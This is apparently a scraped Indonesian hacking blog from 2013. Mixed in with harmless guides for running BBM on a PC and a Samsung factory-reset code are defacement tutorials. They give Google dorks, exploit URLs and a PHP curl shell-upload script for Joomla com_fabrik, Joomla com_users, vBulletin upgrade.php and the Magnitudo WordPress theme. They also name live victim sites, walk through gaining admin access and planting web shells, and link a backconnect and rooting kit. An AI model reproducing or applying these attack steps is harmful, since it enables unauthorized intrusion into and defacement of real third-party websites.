Deface Dengan Exploit Joomla Com_Fabrik

Minggu, 27 Oktober 2013


Nah, Sekarang saya akan Share cara Com_Fabrik yg katanya sih lagi NgeTren hehe :D
Ketimbang Banyak Nyocot Langsung Dehg Kita Liat Langsung. CHECK THIS OUT.!

Kita harus siapkan dulu Dorknya okey :D

Dork: inurl:/index.php?option=com_fabrik atau index.php?option=com_fabrik (Dork Bisa DiKembangin Ya :D)

Poc: index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Live Target: http://www.amada.it/
Tinggal Tambahkan Saja Url Terakhirnya dengan index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Dari http://www.amada.it/ menjadi http://www.amada.it/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

Letak shellnya yaitu ada di
http://www.yourtarget.com/media/shellkamu.php

Tinggal Dieksekusi dah Mas :)

Titip Nick saya yah : Rip HsH

Unlock Password HP Samsung All Type




Demi keamanan data-data penting dalam handphone terkadang kita sering mengunci handphone tersebut dengan menggunakan kata sandi, memang dengan cara seperti itu data-data dalam handphone tidak bisa di lihat oleh tangan-tangan jahil orang lain, 


namun ada kelemahan dari cara tersebut, yaitu ketika kita lupa akan kata sandi dari handphone,otomatis handphone yang kita gunakan pun tidak bisa di buka oleh kita sendiri selaku pemilik hanpdhone, senjata makan tuan lah ibaratnya :D Kali ini saya akan share cara membuka handphone samsung yang terkunci dan kita sendiri lupa kode kuncinya, 

khusus hp samsung ya hehehe untuk mengatasi lupa kode biasanya kita sering membawa kekonter atau ke service center untuk di instal ulang atau flash ulang, 

tapi tahukan kalian bahwa handphone samsung mempunyai kombinasi key yang bisa mereset semua kode dan semua settingan yang telah ada pada handphone kita kodenya cukup simple yaitu *2767*3855#  

Bagi anda yang mengalamin masalah dengan hanpdhone samsung yang terkunci bisa dilakukan dengan cara, cabut simcard hp, lalu hidupkan hp tanpa simcard, saat handphone hidup akan ada beberapa pilihan, seperti masukkan sandi, panggilan darurat dll Kalo masih inget tinggal masukkan saja sandinya, tapi kalau lupa pilih panggilan darurat,

 lalu tekan kombinasi kode *2767*3855# otomatis handphone akan restart dan kembali ke pengaturan pabrik, jadi kamu bisa deh menghemat uang untuk instal ulang hehehe

Install BBM di Laptop

Sabtu, 26 Oktober 2013

Untuk install bbm for android kita perlu menggunakan smartphone yang memiliki sistem operasi minimal 4.0 dan tidak semua smartphone yang memiliki OS itu pun dapat berhasil menginstall BBM for android ini.
Disini saya menyiasatinya dengan menggunakan virtual machine galaxy nexus yang pastinya dapat diinstall BBM for android
  1. Virtualbox : dapat di download disini
  1. Aplikasi Genymotion , bisa didapat disini tapi harus sign up dulu gan 

  1. android sdk bisa di download disini
atau agan ini udah copy ke mediafirenya
nih gan ane udah rangkum semua di akun ane di mediaapi
http://www.mediafire.com/folder/6urs…vq/Alat_Tempur
semoga bermanfaat

langkah – langkah :
  • Install dulu virtualbox nya gan.. tinggal next2 aja iktutin langkahnya,
  • Install genymotionnya

  • setelah terinstall, klik add dan login dengan id yang agan buat tadi.
  • lalu pilih devicenya, disini ane pilih samsung s4/HTC one/Xperia Z yang ada google apps nya
  • Setelah itu klik add dan next dan create , oh ia ini downloadnya butuh koneksi internet ya gan, buat download ova dari virtual machine nya
  • 2








  •  


  • klo yang diminta masukkin sdk masukin aja ke path sdk yang tadi di download bisalkan ada di d:\download\adtbundle\sdk


  • terus setelah selesai di play virtual machine nya, ntar nongol kayak gini nih 3

  • Terus isi aja kuisnya disana 

  • udah gitu download dlu apk bbmnya gan lewat browser, kebetulan ada agan yg share disini

  • nah udah gitu install, lo ada peringatan masuk setting trus ceklis unknown source nya
4
  • terus install deh si bbm nya, dan ikutin step2 nya

  • tampilan awal buat daftarnya nih gan 5

  • udah gitu ikutin aja langkah2nya, atau klo yang masih pusing banyak kok yg share cara installnya, sama cara buat atasin waiting list nya 
  • selesai deh,, gimana gan? bisa ga?? 

Tutorial Install APK 

Screenshot_17
SS Bukti Success :

vBulletin 4.x.x and 5.x.x Upgrade 0day Exploit Tutorial


Selamat Malam para Jomblo Wwkwk :D
Kali ini saya akan post Tutorial Vbullein Upgrade , Oke langsung saja kita liat tutorialnya

Dork :
inurl:"/vbsout.php?do="
intext:"Powered By Vbulletin 4.20"

Exploit :
/install/upgrade.php
/install/update.php
/install/finalupgrade.php 

Dork bisa dikembangin sendiri , jadi jangan malas malasan untuk berpikir karena suatu hal itu ga ada yang mudah atau yang instan , sedangkan mie aja harus dimasak dolo :D hahaha

Oke, selanjutnya
Saya sudah mendapatkan targetnya .

Live Target : http://windowssecrets.com/forums/install/upgrade.php
Maka tampilannya akan seperti ini , Lalu Teken CTRL+U di keyboard anda
Lalu ambil Costumer Numbernya yang seperti ini 3d8965f6b24a76b8cf94479a5258873f

Untuk SS nya seperti ini
  Kalau sudah , langsung ke sini http://coupdegraceofhacker.org/cdg.php
Masukin target tadi :
[+]  website : http://windowssecrets.com/forums/install/upgrade.php [+] Costumer Number : 3d8965f6b24a76b8cf94479a5258873f [+] Username : Masukin seterah kamu . [+] Password : seterah kamu juga  [+] Email : masukin Email kamu
Untuk SS bisa kamu liat disini 
Kalo sudah kamu Teken Inject Admin ..
Nah balik ke Web Tadi ,

 http://windowssecrets.com/forums/admincp/

Masukin ID pass kamu tadi ..
Taraa kamu sudah berhasil 
Untuk Upload shell akan saya share Nanti :D
Happy Hacking :)) 

Cara Deface Dengan Teknik Exploit Joomla | Com_User

Assalamualaikum....

ehm,, jumpa lagi nih dengan coretan2 semerawut ane tapi ngangenin untuk dibaca,, wkkwkwk yo dah, dah pasti pada ga sabar kan udah nunggu dari kemaren?? wkwkwk langsung daaahh :p



Silahkan tutorial ini di baca dulu baik2, dipahami dan dipelajari, baru dah sobat praktekin :p kalo seandainya gagal, itu karena website udah di patch :p

"Talk Less Do More!" 
oke dah simak nih! sebelumnya download dulu bahan2nya :p

1. Download : Exploit Joomla.html   




UPDATE:

Ciri2 web yg vuln com_user, silahkan sobat check dulu login adminnya, jika seperti gambar dibawah, berarti web tersebut memungkinkan untuk bisa di exploitasi, selain itu tidak bisa...


Contoh :
http://troytradingint.com.pe/administrator/

bira lebih memudahkan sobat dalam mencari web target, silahkan gunakan Tool Scanner Com User

Demo:
http://troytradingint.com.pe/
http://www.uog.edu.pk/
http://www.trexperts.com/jeffreytmiller/

Note: "Tidak semua website bisa dengan teknik ini, harap selalu mencari dan mencoba! karena dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!"

Langkah Langkah::

1. Cari web target di Google.com dengan memasukkan Dork berikut:

intext:Joomla! is a flexible and powerful platform, whether you are building a small site for yourself or a huge site with hundreds of thousands of visitors site:com

#Dork Kembangin Sendiri :p

2. Pilih target sobat, lalu masukin exploit berikut:

index.php?option=com_users&view=registration

3. Ane disini mengambil contoh:

http://mobile.resto-lincontournable.com/index.php/utiliser-joomla/utiliser-extensions/composants/composant-flux-rss/un-flux-rss

4. kemudian ane ganti menjadi:

http://mobile.resto-lincontournable.com/index.php?option=com_users&view=registration



5. Setelah itu klik kanan>klik View Page Source atau bisa juga tekan tombol keyboard CTRL+U

kalo sudah muncul page sourcenya, lalu tekan tombol CTRL+F atau klik menu Find ketik hidden. cari seperti kode berikut:



6. Copy kode tersebut, lalu buka Exploit Joomla.html yang udah sobat download tadi dengan Notepad, lalu pastekan kode tersebut, dan masukkan juga site target dan Email sobat! liat gambar !

Note: username, email, boleh diganti sesuka hati.
7. Lalu Save! Setelah itu buka file Exploit Joomla.html nya, Klik Register!

8. Setelah itu akan muncul peringatan bahwa password harus diisi sama! Masukkan password sobat!



9. Setelah password diisi, klik Register! lalu buka email sobat dan klik link Konfirmasinya!









10. Lalu masuk kehalaman admin login nya! 

http://mobile.resto-lincontournable.com/administrator

11. Masukkan Username & Passwordnya! lalu klik Login! kalo contoh disini:

Username:genesis
Password: ****


Tararaaaaaaaaaaaaaa!! Sobat masuk sebagai admin! trus tebas deh index nya :p Liat Cara Tebas Index
KALO GA BERHASIL LOGIN SEBAGAI ADMIN, SILAHKAN CARI TARGET LAINNYA!!

Goodluck!!! :p

udah gitu aja! Salam........ :p

Backconnect Via Putty + Rooting Untuk Ip Dinamis



halo kaka Big Grin cuman mampir dan berbagi pengalaman sedikit Smile) , Seperti Judul diatas kenapa saya blg IP Dinamic Only ? Ini karena hal yang sering terjadi disaat kita listeningkan port namun ga connect2 ke CMD , itulah yang disebut Dinamic (menurut saya)
IP dinamic itu biasanya yang ada diwarnet Smile)

Oke langsung aja comood ya kaka

Silahkan Download Disini


kalo Link mati silahkan Komentar dibawah ya :)

Tutorial Deface Magnitudo theme Arbitrary File Upload Vulnerability





 Google Dork : inurl:wp-content/themes/magnitudo  

Use your brain untuk menemukan dork lainnya :)

Exploit :


<?php
$uploadfile="shell.php";
curl_setopt($ch, CURLOPT_POST, true); 
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Pertama download XAMMP nya HERE HERE

Jika Sudah , Cari File php.ini di System[C] -> Xammp -> Php -> Php.ini

Lalu tekan Control F dan ketikkan "curl" tanpa tanda kutip , lalu jika ketemu kamu hapus tandan ( ; ) , Lalu save ..

Oke , sekarang kamu Copy Exploitnya dan save dengan extensi .php

Simpan di folder xammp -> xammp -> PHP

Kedua , kamu copy shell kamu ke Folder xammp -> xammp -> PHP

Misalkan nama shell anda x.php ganti shell php yang ada di exploit tadi

$uploadfile="shell.php"; kamu rename dengan nama shell kamu tadi jika namanya x.php kamu rename menjadi x.php juga :))

Oke sekarang langsung saja , Pertama kita cari target dengan GOOGLE DORK tadi

Ex : http:/www.site.com/


Lalu tambahkan dengan exploitnya
/wordpress/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php

Jika Ada Error Files Upload  berarti itu vuln .

Buka exploitnya kamu copy semuanya ke exploit tadi 

Lalu buka CMD , 

Ketikkan cd xammp enter >> cd php enter

Jika succes , filenya akan berada disini



http://site.com/wordpress/wp-content/uploads/2013/10/x.php

Install Blackberry Messenger (BBM) Di PC / Laptop








Assalamualikum.... 

Setelah diluncurkannya aplikasi messenger besutan RIM Motion yaitu Blackberry Messenger untuk Android dan iOS beberapa waktu yang lalu membuat aplikasi ini menjadi sangat didambakan para jejaring sosial, mengingat aplikasi messenger ini merupakan yang paling terlaris dan paling banyak penggunanya yang terhubung hanya melalui perangkat Blackberry saja. Saat ini semua pengguna Android dan iOS telah bisa menikmati aplikasi tersebut dengan Gratis. tapi tidak semua OS Android compatible untuk dipasangkan dengan BBM, syaratnya minimal smartphone yang menggunakan Android 4.0 Icecream Sandwich. Nah, bagaimana kalau Smartphone sobat tidak memenuhi persyaratan yg ditentukan? tidak perlu bersedih hati, karena sobat bisa mencicipi BBM tersebut melalui komputer maupun laptop dengan memanfaatkan software virtual. silahkan disimak aja :)

Ada Tiga cara yang bisa sobat lakukan untuk menggunakan aplikasi BBM menggunakan PC / Laptop

CARA PERTAMA

Status : Tested & Work for All OS Tanpa ada Masalah!!!!
Specifikasi : Acer Intel Core i3, RAM 2GB, VGA Intel HD




Sediakan peralatan yang diperlukan:

1. Laptop / PC | Belii :p

2. Android SDK | Download

3. Java | Download

4. Blackbery Messenger | Download

5. ID Blackberry | Register here



Langkah - Langkah

Pertama silahkan daftarkan dulu ID blackberry untuk memudahkan proses instalasi aplikasi BBMannya :)



Kemudian donlot peralatan yang dibutuhkan, install Java dulu yah biar bisa jalan. kemudian extrack Android SDK di partisi yg diinginkan,, kalo saya sendiri file diletakkan di partisi E:/




Kemudian buka file SDK Manager, Lalu klik Tools > Manage AVD'> klik New


Setting aja sesuai keinginan, klo ga tau boleh niru punya saya :D Klik OK


Nah, proses pengaturan selesai. kalo ceklis hijau, berarti tidak ada yg salah dalam pengaturan tadi. lalu klik Start

Nah, Androidnya udah bisa jalan :)


Trus bagaimana install BBM.apk nya??? mudah saja tinggal copy dan pastekan ke folder platform-tools. kemudian buka terminal dan masuk ke path E:\Android-SDK\sdk\platform-tools, dan masukan perintah : adb.exe install bbm.apk Lihat gambar !!


Tunggu saja proses instalasinya hingga selesai, kalo udah selesai maka BBM akan muncul di menu android. Lihat gambar!!


Nah, udah selesai tinggal dibuka aplikasinya :)



lalu masukkan email sobat yang telah terdaftar di Blackcerry ID




Selanjutnya klik Next aja



Kemudian silahkan Sign in menggunakan akun ID yang terdaftar di Blackberry



Kemudian isi form yg ada sesuai keinginan. lalu klik Submit



Nah, tinggal menunggu proses validasi selesai



Setelesah selesai, maka sobat akan mendapatkan PIN nya.. Jangan lupa Invite saya yah :D






CARA KEDUA lagi proses.......




Sediakan peralatan yang diperlukan:

1. Laptop / PC | Belii :p

2. Android SDK | Download

3.

4. Blackbery Messenger | Download

5. ID Blackberry | Register here




Langkah - Langkah

Pertama silahkan daftarkan dulu ID blackberry untuk memudahkan proses instalasi aplikasi BBMannya :)



CARA KETIGA

Status : Tested on Windows 8 & Linux Ubuntu dan Sedikit bermasalah!!!!!!!!!!
Specifikasi : Acer Intel Core i3, RAM 2GB, VGA Intel HD


Sediakan bahan-bahan yang diperlukan:

1. Virtualbox v.4.3-x86/amd64 | Download

2. OS Android 4.1 JellyBean | Download

3. ID Blackberry | Register here

4. Blackbery Messenger | Download




Langkah - Langkah

Pertama silahkan daftarkan dulu ID blackberry untuk memudahkan proses instalasi aplikasi BBMannya :)



Kemudian install Androidnya di virtualbox. bagi yang belum tau caranya, silahkan lihat : Cara Install Android Di Virtualbox.



Setelah itu copy BBM.apk melalui flashdisk ke virtual Android yang sudah diinstal tadi. caranya coopy dulu file BBM.apk ke flashdisk, lalu di virtual klik Device > Mass Setorage Device. tunggu proses pembacaan flashdisk hingga selesai.



Lalu ubah Settingan agar Androidnya bisa diinstall aplikasi dari luar Playstore. caranya klik Setting > Security > ceklis Unknown Source.




Kemudian buka ASTRO, klik File Manager > klik UP > klik folder USB



Setelah itu double klik file BBM, lalu klik Install




Silahkan tunggu hingga proses instalasi selesai.



Kalo udah selesai, tinggal buka aja aplikasi BBMnya :) dan proses selanjutnya sama seperti proses diatas.



Sekian tutorial dari saya, jika ada yang perlu ditanyakan silahkan berikan komentar :)